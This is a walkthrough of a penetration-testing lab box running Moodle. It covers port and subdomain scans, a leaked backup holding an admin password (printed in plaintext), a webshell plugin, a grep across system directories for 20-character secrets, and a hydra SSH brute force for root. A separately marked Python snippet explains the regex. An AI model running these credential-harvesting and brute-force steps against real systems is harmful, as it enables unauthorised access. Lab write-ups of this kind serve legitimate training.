Moddle

10.213.193.76

Information gathering

Port scanning

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.213.193.76                                                        [11:28:08]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.213.193.76:22
Open 10.213.193.76:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-11 11:28 CST
Initiating ARP Ping Scan at 11:28
Scanning 10.213.193.76 [1 port]
Completed ARP Ping Scan at 11:28, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.08s elapsed
DNS resolution of 1 IPs took 0.08s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:28
Scanning 10.213.193.76 [2 ports]
Discovered open port 80/tcp on 10.213.193.76
Discovered open port 22/tcp on 10.213.193.76
Completed SYN Stealth Scan at 11:28, 0.03s elapsed (2 total ports)
Nmap scan report for 10.213.193.76
Host is up, received arp-response (0.00061s latency).
Scanned at 2026-01-11 11:28:33 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:7F:93:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Add the entry to the hosts file

vim /etc/hosts

10.213.193.76 moodle.dsz

Subdomain brute-forcing

wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u moodle.dsz -H 'Host: FUZZ.moodle.dsz' --hh 20

Directory scan of the dev subdomain

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://dev.moodle.dsz                                               [11:54:17]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_dev.moodle.dsz/_26-01-11_11-54-23.txt

Target: http://dev.moodle.dsz/

[11:54:23] Starting:
[11:54:23] 403 - 279B - /.ht_wsr.txt
[11:54:24] 403 - 279B - /.htaccess.bak1
[11:54:24] 403 - 279B - /.htaccess.orig
[11:54:24] 403 - 279B - /.htaccess.sample
[11:54:24] 403 - 279B - /.htaccess.save
[11:54:24] 403 - 279B - /.htaccess_extra
[11:54:24] 403 - 279B - /.htaccess_orig
[11:54:24] 403 - 279B - /.htaccessBAK
[11:54:24] 403 - 279B - /.htaccess_sc
[11:54:24] 403 - 279B - /.htaccessOLD
[11:54:24] 403 - 279B - /.htaccessOLD2
[11:54:24] 403 - 279B - /.htm
[11:54:24] 403 - 279B - /.html
[11:54:24] 403 - 279B - /.htpasswds
[11:54:24] 403 - 279B - /.httr-oauth
[11:54:24] 403 - 279B - /.htpasswd_test
[11:54:24] 403 - 279B - /.php
[11:54:27] 200 - 74MB - /backup.tar.gz
[11:54:29] 302 - 0B - /dashboard.php -> index.php
[11:54:31] 302 - 0B - /logout.php -> index.php
[11:54:35] 403 - 279B - /server-status
[11:54:35] 403 - 279B - /server-status/

Task Completed
root@LAPTOP-O235O5EH [~] ➜ [11:54:38]

/backup.tar.gz

This is a backup of moodle.dsz; the password was found in config.php.

Log in to moodle.dsz

admin:pzp5V2Of3akjaJrhRauR.

www shell

Upload the webshell plugin

https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file

Execute the webshell

Reverse shell

Privilege escalation

www -> kotori

kotori's password is the same as the Moodle password.

kotori:pzp5V2Of3akjaJrhRauR.

kotori -> root, method one

There is a hint in the /opt directory.

Search with a regular expression

grep -raohE '\b[a-zA-Z0-9]{20}\b' /etc /var/www /opt /home 2>/dev/null >> a.txt

Word-boundary matching is required, because:

  • With a 25-character string such as 1234567890abcdefghijklmno, a bare {20} would cut out the first 20 characters, the middle 20 characters and other fragments that satisfy {20}, so the results would all be invalid.
  • With \b added, only complete 20-character runs whose neighbours are non-alphanumeric (or the start / end of the line) are matched, which ensures the hits are standalone 20-character strings (the ^[a-zA-Z0-9]{20}$ shape described in the hint).
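To make the word-boundary point concrete, here is an added Python example (not from the original writeup) that runs the page's character class and length with and without \b over a constructed sample; the sample text and the function names are my own.

```python
import re

# Same character class and length as the grep on the page; the only
# difference between the two patterns is the \b word boundaries.
BOUNDED = re.compile(r'\b[a-zA-Z0-9]{20}\b')
UNBOUNDED = re.compile(r'[a-zA-Z0-9]{20}')
HINT = re.compile(r'^[a-zA-Z0-9]{20}$')  # the shape the /opt hint describes

# Constructed sample text (not taken from the target): a 25-character run,
# a standalone 20-character token, a 20-character token followed by a dot,
# and a 19-character token that must never match.
SAMPLE = """\
long=1234567890abcdefghijklmno
token=AbCdEfGhIjKlMnOpQrSt
trail=zyxwvutsrqponmlkjihg.
short=0123456789abcdefghi
"""


def find_tokens(text, bounded=True):
    """Return every 20-character alphanumeric run in text, in order.

    bounded=True requires the run to be delimited by non-word characters
    or line edges, so a longer run yields nothing.  bounded=False behaves
    like grep -oE without \\b: it slices a 20-character window out of the
    25-character run, producing a fragment that cannot be the password.
    Note: both grep's \\b and Python's \\b treat '_' as a word character.
    """
    pattern = BOUNDED if bounded else UNBOUNDED
    return pattern.findall(text)


def matches_hint(candidate):
    """True when the candidate has exactly the ^[a-zA-Z0-9]{20}$ shape."""
    return HINT.match(candidate) is not None


def unique_candidates(text):
    """Deduplicated bounded matches, the equivalent of grep ... | sort -u."""
    return sorted(set(find_tokens(text, bounded=True)))


if __name__ == "__main__":
    print("without \\b:", find_tokens(SAMPLE, bounded=False))
    print("with \\b:   ", find_tokens(SAMPLE, bounded=True))
```

Every bounded match passes matches_hint, whereas the unbounded run also returns the fragment 1234567890abcdefghij carved out of the 25-character string.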

Brute-forcing with hydra

hydra -l root -P a.txt -t 4 -I -f -vV 10.213.193.76 ssh

kotori -> root, method two

In kotori's home directory, .bash_history contains the command history.

It shows a `last` invocation and a download of linpeas.

last is the built-in Linux tool for system auditing and querying login history.

Running last shows some garbled-looking output.

By default, last shows only an abbreviated login record; for the full details use -F (full timestamps), -i (IP addresses in numeric form) and -w (full usernames).

That is the root password.